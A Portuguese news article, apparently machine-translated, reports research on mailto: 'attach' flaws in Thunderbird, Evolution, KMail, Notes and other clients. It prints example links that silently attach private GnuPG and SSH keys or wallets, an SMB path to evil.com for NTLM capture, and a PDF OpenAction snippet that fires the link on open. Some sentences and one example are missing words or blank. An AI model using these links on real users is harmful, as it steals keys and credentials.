Pesquisadores da Ruhr University Bochum (Alemanha) () comportamento dos clientes de e-mail ao processar links “mailto:” com parâmetros avançados. Cinco dos vinte clientes de e-mail examinados eram vulneráveis a um ataque que manipulava a substituição de recursos usando o parâmetro “attach”. Outros seis clientes de e-mail estavam vulneráveis a um ataque de substituição de chaves PGP e S/MIME, e três clientes estavam vulneráveis a um ataque para extrair o conteúdo de mensagens criptografadas.
Ligações «"são utilizados para automatizar a abertura de um cliente de e-mail para escrever uma carta ao destinatário especificado no link. Além do endereço, você pode especificar parâmetros adicionais como parte do link, como o assunto da carta e um modelo para conteúdo típico. O ataque proposto manipula o parâmetro “attach”, que permite anexar um anexo à mensagem gerada.
Os clientes de email Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089) e Pegasus Mail estavam vulneráveis a um ataque trivial que permite anexar automaticamente qualquer arquivo local, especificado por meio de um link como “mailto:?attach=path_to_file”. O arquivo é anexado sem exibir aviso, portanto, sem atenção especial, o usuário pode não perceber que a carta será enviada com anexo.
Por exemplo, usando um link como “mailto:[email protegido]&subject=Title&body=Text&attach=~/.gnupg/secring.gpg" você pode inserir chaves privadas do GnuPG na carta. Você também pode enviar o conteúdo de carteiras criptografadas (~/.bitcoin/wallet.dat), chaves SSH (~/.ssh/id_rsa) e quaisquer arquivos acessíveis ao usuário. Além disso, o Thunderbird permite anexar grupos de arquivos por máscara usando construções como “attach=/tmp/*.txt”.
Além dos arquivos locais, alguns clientes de email processam links para armazenamento de rede e caminhos no servidor IMAP. Em particular, o IBM Notes permite transferir um arquivo de um diretório de rede ao processar links como “attach=\\evil.com\dummyfile”, bem como interceptar parâmetros de autenticação NTLM enviando um link para um servidor SMB controlado pelo invasor (a solicitação será enviada com o usuário atual dos parâmetros de autenticação).
O Thunderbird processa com sucesso solicitações como “attach=imap:///fetch>UID>/INBOX>1/”, que permitem anexar conteúdo de pastas no servidor IMAP. Ao mesmo tempo, as mensagens recuperadas do IMAP, criptografadas via OpenPGP e S/MIME, são automaticamente descriptografadas pelo cliente de e-mail antes do envio. Os desenvolvedores do Thunderbird foram sobre o problema em fevereiro e na edição O problema já foi corrigido (as filiais 52, 60 e 68 do Thunderbird permanecem vulneráveis).
Versões antigas do Thunderbird também eram vulneráveis a duas outras variantes de ataque ao PGP e S/MIME propostas pelos pesquisadores. Em particular, o Thunderbird, assim como o OutLook, PostBox, eM Client, MailMate e R2Mail2, foi alvo de um ataque de substituição de chave, causado pelo facto de o cliente de email importar e instalar automaticamente novos certificados transmitidos em mensagens S/MIME, o que permite o invasor organize a substituição de chaves públicas já armazenadas pelo usuário.
O segundo ataque, ao qual são suscetíveis Thunderbird, PostBox e MailMate, manipula as funcionalidades do mecanismo de salvamento automático de rascunhos de mensagens e permite, através de parâmetros mailto, iniciar a descriptografia de mensagens criptografadas ou a adição de uma assinatura digital para mensagens arbitrárias, com transmissão subsequente do resultado para o servidor IMAP do invasor. Neste ataque, o texto cifrado é transmitido através do parâmetro “body” e a tag “meta update” é usada para iniciar uma chamada ao servidor IMAP do invasor. Por exemplo: ' '
Para processar automaticamente links “mailto:” sem interação do usuário, documentos PDF especialmente projetados podem ser usados - a ação OpenAction em PDF permite iniciar automaticamente o manipulador mailto ao abrir um documento:
% PDF-1.5
1 0 obj.
<< /Tipo /Catálogo /OpenAction [2 0 R] >>
endoobj
2 0 obj.
<< /Type /Action /S /URI/URI (mailto:?body=——BEGIN PGP MESSAGE——[…])>>
endoobj
Fonte: opennet.ru